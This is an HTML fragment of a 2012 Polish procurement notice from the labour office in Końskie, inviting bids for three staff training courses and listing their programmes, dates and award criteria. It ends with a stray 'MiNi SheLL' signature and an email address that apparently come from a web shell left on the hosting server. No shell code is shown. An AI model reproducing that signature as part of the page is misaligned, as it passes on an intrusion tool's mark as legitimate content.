<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Końskich, ul. Staszica 2, 26 - 200 Końskie I piętro pokój nr 29.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2012 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Końskich ul. Staszica 2, 26 - 200 Końskie, I piętro pokój nr 18 sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Fundusz Pracy w ramach projektu współfinansowanego z EFS..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pośrednictwo pracy - nowe wyzwania w związku ze zmianami w rozporządzeniu w sprawie standardów i warunków prowadzenia usług rynku pracy - szkolenie otwarte..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Omówienie zmian - stare  i  nowe  przepisy prawne regulujące świadczenie usług rynku pracy.
2.	Nowe procedury prowadzenia pośrednictwa pracy - cele wprowadzonych zmian.
3.	Nowoczesne metody i formy prowadzenia pośrednictwa pracy.
4.	Zmiany w obowiązującej dokumentacji.
5.	Nawiązywanie i podtrzymywanie kontaktów z pracodawcami.
6.	Współpraca z pracodawcą - zmiany.
7.	Podejmowanie i utrzymywanie kontaktu z osobami bezrobotnymi.
Liczba uczestników szkolenia 		-	3 osoby.
Liczba godzin dydaktycznych 		-	25 - 30  h.
Czas trwania szkolenia 			-	4 - 5   dni.
Termin realizacji szkolenia 		-	październik - grudzień 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie wykonawcy w realizacji usług zgodnych z przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Efektywna współpraca pośrednika pracy z pracodawcami, dokumentowanie ścieżki aktywizacji, Indywidualny Plan Działania - szkolenie otwarte..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Współpraca z pracodawcami w świetle przepisów prawnych.
2.	Segmentacja pracodawców w aspekcie różnych kryteriów.
3.	Tworzenie baz danych pracodawców.
4.	Kontakty pośrednika z pracodawcami - efektywne pozyskiwanie pracodawców do współpracy          ( rozpoznawanie potrzeb lokalnego rynku pracy, określanie celu i zasad współpracy, planowanie pracy pośrednika w obszarze lokalnych pracodawców, prowadzenie współpracy z pracodawcami - ustalanie potrzeb, oferowanie różnych form  pomocy).
5.	Formy i metody współpracy pośrednika pracy z pracodawcami.
6.	Pomoc pracodawcom w doborze kandydatów do pracy ( formy pomocy, imprezy promujące usługi urzędu, rodzaje i sposoby pozyskiwania ofert pracy, przyjmowanie, ustalanie warunków realizacji i realizacja ofert pracy - dokumentacja, współpraca z innymi specjalistami urzędu pracy w zakresie realizacji ofert pracy i potrzeb pracodawców ).
7.	Segmentacja i aktywizacja osób zarejestrowanych w PUP - ścieżka aktywizacji.
8.	Indywidualny Plan Działania.

Liczba uczestników szkolenia 		-	3 osoby.
Liczba godzin dydaktycznych 		-	25 - 30 h.
Czas trwania szkolenia 			-	4 - 5 dni.
Termin realizacji szkolenia 		-	październik   - grudzień 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie wykonawcy w realizacji usług zgodnych z przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs  inspiracji - szkolenie otwarte..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Program szkolenia :

1.	Warunki organizacyjne i założenia teoretyczne Kursu inspiracji.
2.	Kształcenie ustawiczne i pedagogika oparta na doświadczeniu.
3.	Zmiana społeczna jako źródło rozwoju.
4.	Psychologiczne oddziaływanie bezrobocia.
5.	Problemy tożsamości i wartości oraz zainteresowania.
6.	Analiza transakcyjna.
7.	Identyfikacja postaw i rodzaje transakcji.
8.	Techniki komunikacji i ich konsekwencje, asertywność.
9.	Wyrażanie pozytywnych postaw wobec innych.
10.	Plan działania - określanie celów i tworzenie indywidualnego planu działania.
11.	Poszukiwanie rozwiązań odnoszących się do określonych problemów, kuźnia przyszłości, pozytywne myślenie.
12.	Funkcje ewaluacji w poradnictwie grupowym.



Liczba uczestników szkolenia 		-	1 osoba.
Liczba godzin dydaktycznych 		-	20 - 25 h.
Czas trwania szkolenia 			-	3 - 4  dni.
Termin realizacji szkolenia 		-	październik   - grudzień 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie wykonawcy w realizacji usług zgodnych z przedmiotem zamówienia - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com